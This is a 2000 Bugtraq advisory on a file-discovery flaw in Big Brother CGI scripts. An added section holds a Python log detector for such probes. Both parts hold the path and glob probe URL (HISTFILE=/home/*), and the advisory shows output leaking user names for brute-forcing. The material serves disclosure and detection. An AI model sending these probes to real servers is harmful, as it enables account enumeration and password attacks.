Date:         Tue, 21 Nov 2000 10:33:42 -0800
From: Loki <loki@F8LABS.COM>
Subject:      Big Brother Advisory - Fate Research Labs
To: BUGTRAQ@SECURITYFOCUS.COM

    -----------------.---------------------------------------------.
  /|                 |                             .               |
 / | :               : :             : :             :             |
|  | ::        ------  ::            : ::          | ::     -      |-----
|  | ::              : ::     .      :      |      | ::            :     |
|  |                 :        .      |------|      |               :     |
|  |           ------^        :      |     /       |                     .
|  ;----------"---------------^------     /  ------'---------------------
| /          /               /      /----'        /                     /
|'----------'---------------'------'     --------'---------------------'
                                www.f8labs.com





[ INTRODUCTION ]

Advisory .........: File Discovery Vulnerability
Release Date .....: 11-20-00
Application ......: bb-hist.sh
                    bb-histlog.sh
                    bb-hostsvc.sh
                    bb-rep.sh
                    bb-replog.sh
                    bb-ack.sh
Vendor Web Site ..: www.bb4.com
Versions Affected.: All installed BB CGI scripts prior to v1.5d3
Vendor Status ....: Contacted // Patch Available (Thanks Robert for
                    being so cooperative.)
WWW ..............: www.f8labs.com
SHOUTS ...........: Moo baby, Im a sexy cow, yea!




[ OVERVIEW ]

Big Brother is designed to let anyone - from omniscient Sys
Admins, to Pointy-Headed Bosses, see how the network is doing
in near real-time, from any web browser, anywhere.



[ ADVISORY ]

Vulnerabilities exist such that someone can identify whether
sensitive files exist and determine user IDs on the BBDISPLAY
server(s), and use those to launch a password brute-force attack.

e.g. http://www.victim.com/cgi-bin/bb-hist.sh?HISTFILE=/home/*

history
Mon Nov 20 22:07:25 EST 2000

Error reading history file [adam]

Using this information, we can validate not only whether
sensitive files exist on the system, but also which user
accounts are valid, for a further brute-force attack on the system.
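
Added example, not part of the original advisory or of Big Brother: a
log check that flags requests to the CGI scripts listed above whose
parameter values carry path or glob characters, as in the HISTFILE request
shown. It assumes NCSA common/combined access log format and that legitimate
values never contain such characters; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# CGI scripts named in the advisory's "Application" field.
AFFECTED = {"bb-hist.sh", "bb-histlog.sh", "bb-hostsvc.sh",
            "bb-rep.sh", "bb-replog.sh", "bb-ack.sh"}

# Assumption: legitimate parameter values never contain a path
# separator, a glob metacharacter, or a ".." sequence.
SUSPICIOUS = re.compile(r"[/\\*?\[\]]|\.\.")

# Client address, request target and status of a common/combined log line.
REQUEST = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')

def find_probes(lines):
    """Return (client, script, param, value) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, _status = m.groups()
        url = urlsplit(target)
        script = url.path.rsplit("/", 1)[-1]
        if script not in AFFECTED:
            continue
        # parse_qsl percent-decodes, so %2F and %2A are caught as well.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SUSPICIOUS.search(value):
                hits.append((client, script, name, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Nov/2000:22:07:25 -0500] "GET /cgi-bin/bb-hist.sh?HISTFILE=/home/* HTTP/1.0" 200 312',
    '192.0.2.10 - - [20/Nov/2000:22:07:31 -0500] "GET /cgi-bin/bb-hist.sh?HISTFILE=%2Fhome%2F%2A HTTP/1.0" 200 312',
    '198.51.100.7 - - [20/Nov/2000:22:09:02 -0500] "GET /cgi-bin/bb-hist.sh?HISTFILE=www.example.com.http HTTP/1.0" 200 4120',
    '198.51.100.7 - - [20/Nov/2000:22:09:40 -0500] "GET /index.html?next=/home/ HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(*hit)
```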



[ RESOURCES ]

Patch Details
http://bb4.com/incident.nov21

Big Brother Technologies
http://www.bb4.com

Fate Research Labs
http://www.f8labs.com



================================================================
Loki
Fate Research Labs
loki@f8labs.com
----------------------------------------------------------------
BEGIN PGP SIGNATURE

iQA/AwUBOfZvfGnwBJRV5bxfEQJu7gCfQ/T0O9u75nzRGWVSeurNmnFRVr8Anj0c
M+UXhPDBvsm+ffRpv41zevQN
=3IRx
================================================================